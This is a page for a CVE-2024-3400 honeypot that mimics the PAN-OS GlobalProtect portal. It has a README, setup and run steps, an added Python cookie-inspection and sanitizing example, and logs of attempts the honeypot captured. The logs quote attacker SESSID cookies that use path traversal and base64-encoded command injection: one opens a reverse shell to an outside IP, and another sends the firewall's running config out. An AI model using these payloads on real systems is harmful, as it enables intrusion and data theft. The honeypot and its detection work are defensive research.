
CVE-2024-3400 PoC — PAN-OS: Arbitrary File Creation Leads to OS Command Injection Vulnerability in GlobalProtect

Associated Vulnerability

Title: PAN-OS: Arbitrary File Creation Leads to OS Command Injection Vulnerability in GlobalProtect (CVE-2024-3400)

Description: A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.

Description

Simple honeypot for CVE-2024-3400 Palo Alto PAN-OS Command Injection Vulnerability
Readme
# CVE-2024-3400-pot
Simple honeypot for CVE-2024-3400, the Palo Alto PAN-OS command injection vulnerability in GlobalProtect.

# Features
* Serve a copy of the GlobalProtect Portal login page at `/global-protect/login.esp`
* Accept `POST /ssl-vpn/hipreport.esp` requests that carry the traversal cookie `Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/<file>;`
* Extract the target filename from the cookie (if present)
* Save the body of the POST request to that file
* Answer `GET /global-protect/portal/images/<file>` for a previously planted file with `403` instead of `404`, as the real device would
* Record the source IP and User-Agent of every request
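The request handling that the feature list describes, as an added example that is not the repository's own code: a stdlib-only Python module that splits the Cookie header, flags a SESSID value carrying path traversal or shell metacharacters, sanitizes the filename before the POST body is stored under `suspicious_files/`, and returns `403` for a planted file on the follow-up GET. It does not use Flask, the sample cookies are constructed (the second one carries a harmless base64 placeholder, not a real payload), and the function and constant names are this example's own.

```python
import os
import posixpath
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed Cookie headers modelled on the shapes in the README's example logs
# (the second uses the harmless base64 placeholder "QUJD", not a real payload).
SAMPLE_COOKIES = [
    "SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/rdpj22uy8h.txt;",
    "SESSID=/../../../../opt/panlogs/tmp/device_telemetry/minute/test`echo${IFS}QUJD|base64${IFS}-d|bash`",
    "SESSID=abc123; theme=dark",
]

TRAVERSAL_RE = re.compile(r"(^|/)\.\.(/|$)")
# Shell metacharacters that never belong in a session identifier.
SHELL_MARKERS = ("`", "${IFS}", "$(", "|")
# Names the honeypot is willing to store: one flat path component, no separators.
SAFE_NAME_RE = re.compile(r"[A-Za-z0-9._-]{1,64}")
STORE_DIR = "suspicious_files"  # assumed layout, matches the repo's directory name


@dataclass
class SessidVerdict:
    raw: Optional[str]
    traversal: bool = False
    command_markers: List[str] = field(default_factory=list)
    normalized_path: Optional[str] = None
    filename: Optional[str] = None

    @property
    def suspicious(self) -> bool:
        return self.traversal or bool(self.command_markers)


def parse_cookie_header(header: str) -> Dict[str, str]:
    """Split a Cookie header into name/value pairs. Only the first '=' separates
    name from value, so an '=' inside a value (base64 padding) is preserved."""
    cookies: Dict[str, str] = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name:
            cookies[name.strip()] = value
    return cookies


def inspect_sessid(header: str) -> SessidVerdict:
    """Flag a SESSID cookie that carries path traversal or shell metacharacters."""
    raw = parse_cookie_header(header).get("SESSID")
    verdict = SessidVerdict(raw=raw)
    if raw is None:
        return verdict
    if TRAVERSAL_RE.search(raw):
        verdict.traversal = True
        # Collapse the '..' segments to see which path was actually targeted.
        verdict.normalized_path = posixpath.normpath("/" + raw.lstrip("/"))
        verdict.filename = posixpath.basename(verdict.normalized_path)
    verdict.command_markers = [m for m in SHELL_MARKERS if m in raw]
    return verdict


def safe_filename(name: Optional[str]) -> Optional[str]:
    """Return the name if it is a plain, flat file name; None otherwise.
    The honeypot must never let the attacker's path escape STORE_DIR."""
    if not name or posixpath.basename(name) != name:
        return None
    if not SAFE_NAME_RE.fullmatch(name):
        return None
    return name


def store_body(name: str, body: bytes, directory: str = STORE_DIR) -> Optional[str]:
    """Write the POST body under directory/name; refuse unsafe names."""
    clean = safe_filename(name)
    if clean is None:
        return None
    os.makedirs(directory, exist_ok=True)
    path = os.path.join(directory, clean)
    with open(path, "wb") as fh:
        fh.write(body)
    return path


def status_for_image_get(path: str, planted: set) -> int:
    """403 for a file an earlier POST planted, 404 otherwise (as in the README)."""
    prefix = "/global-protect/portal/images/"
    if path.startswith(prefix) and path[len(prefix):] in planted:
        return 403
    return 404


if __name__ == "__main__":
    planted = set()
    for cookie in SAMPLE_COOKIES:
        v = inspect_sessid(cookie)
        print(f"suspicious={v.suspicious} traversal={v.traversal} "
              f"markers={v.command_markers} file={v.filename}")
        if v.traversal and store_body(v.filename, b"", STORE_DIR):
            planted.add(v.filename)
    print(status_for_image_get("/global-protect/portal/images/rdpj22uy8h.txt", planted))  # 403
```

The point of `safe_filename` is that a honeypot which writes attacker-chosen names to disk inherits the same file-write primitive it is trying to observe; only the basename is stored, and a name containing backticks, `${IFS}` or separators is logged but never written.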

# Prerequisites
* Python 3.x installed on your server.
* Flask, installed with pip:
  * `pip install flask`
* A self-signed certificate and private key, generated with OpenSSL:
  ```
  $ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365

  Enter PEM pass phrase:
  Verifying - Enter PEM pass phrase:
  -----
  You are about to be asked to enter information that will be incorporated
  into your certificate request.
  What you are about to enter is what is called a Distinguished Name or a DN.
  There are quite a few fields but you can leave some blank
  For some fields there will be a default value,
  If you enter '.', the field will be left blank.
  -----
  Country Name (2 letter code) [XX]:XX
  State or Province Name (full name) []:XX
  Locality Name (eg, city) [Default City]:
  Organization Name (eg, company) [Default Company Ltd]:XX
  Organizational Unit Name (eg, section) []:XX
  Common Name (eg, your name or your server's hostname) []:XX
  Email Address []:XX
  ```

  * Remove the passphrase from the private key so the honeypot can start unattended:
  ```
  $ openssl rsa -in key.pem -out key1.pem
  Enter pass phrase for key.pem:
  writing RSA key

  $ mv key1.pem key.pem
  ```

# Usage
To start the honeypot, run the following command:
```
sudo nohup python3 CVE-2024-3400-pot.py &
disown
```

* Check that the script is running and listening on port 443:
```
sudo netstat -lnput | grep 443
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      1208/python3

sudo ps aux | grep <PID>
sonic        1208  0.0  3.5 189448 34364 pts/0    S    00:35   0:17 python3 CVE-2024-3400-pot.py
```

# Example Logs
```
INFO:werkzeug:WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on all addresses (0.0.0.0)
 * Running on https://127.0.0.1:443
 * Running on https://<IP>:443
INFO:werkzeug:Press CTRL+C to quit
INFO:root:Request from 45.61.138.35, User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36, Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/rdpj22uy8h.txt;
WARNING:root:Detected suspicious file creation attempt: rdpj22uy8h.txt from 45.61.138.35
INFO:werkzeug:45.61.138.35 - - [23/Apr/2024 01:31:56] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 -
WARNING:root:Suspicious file requested - rdpj22uy8h.txt from 45.61.138.35, User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
INFO:werkzeug:45.61.138.35 - - [23/Apr/2024 01:31:56] "GET /global-protect/portal/images/rdpj22uy8h.txt HTTP/1.1" 403 -
WARNING:root:Suspicious file requested - rdpj22uy8h_test.txt from 45.61.138.35, User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
INFO:root:Request from 158.255.213.74, User-Agent: python-requests/2.25.1, Cookie: SESSID=/../../../../opt/panlogs/tmp/device_telemetry/minute/test`echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xNTguMjU1LjIxMy43NC82MDU0NCAwPiYx|base64${IFS}-d|bash`
INFO:werkzeug:158.255.213.74 - - [23/Apr/2024 04:46:48] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 -
INFO:root:Request from 92.119.159.68, User-Agent: curl/7.58.0, Cookie: SESSID=/../../../../opt/panlogs/tmp/device_telemetry/minute/aaba`echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgb3M7IG9zLnBvcGVuKCJjdXJsIC1rIC1YIFBPU1QgLWQgQC9vcHQvcGFuY2ZnL21nbXQvc2F2ZWQtY29uZmlncy9ydW5uaW5nLWNvbmZpZy54bWwgaHR0cHM6Ly8xODUuMTA0LjE5NC40NzoxMDAwMiIpJw==|base64${IFS}-d|bash`
INFO:werkzeug:92.119.159.68 - - [24/Apr/2024 15:17:45] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 -

```
File Snapshot

```
[4.0K] /data/pocs/816e47672cac81602c6207befff778f0dcd3118e
├── [ 20K] CVE-2024-3400-pot.py
├── [4.0K] global-protect
│   └── [4.0K] portal
│       ├── [4.0K] css
│       │   ├── [152K] bootstrap.min.css
│       │   ├── [ 532] ie10-viewport-bug-workaround.css
│       │   ├── [ 10K] latofonts.css
│       │   └── [ 22K] login.css
│       ├── [4.0K] images
│       │   ├── [540K] bg.png
│       │   ├── [2.5K] favicon.ico
│       │   ├── [8.7K] logo-pan-48525a.png
│       │   └── [ 12K] logo-pan-48525a.svg
│       └── [4.0K] js
│           ├── [ 662] ie10-viewport-bug-workaround.js
│           └── [ 87K] jquery.min.js
├── [1.0K] LICENSE
├── [4.2K] README.md
└── [4.0K] suspicious_files
    └── [   1] rdpj22uy8h.txt

6 directories, 14 files
```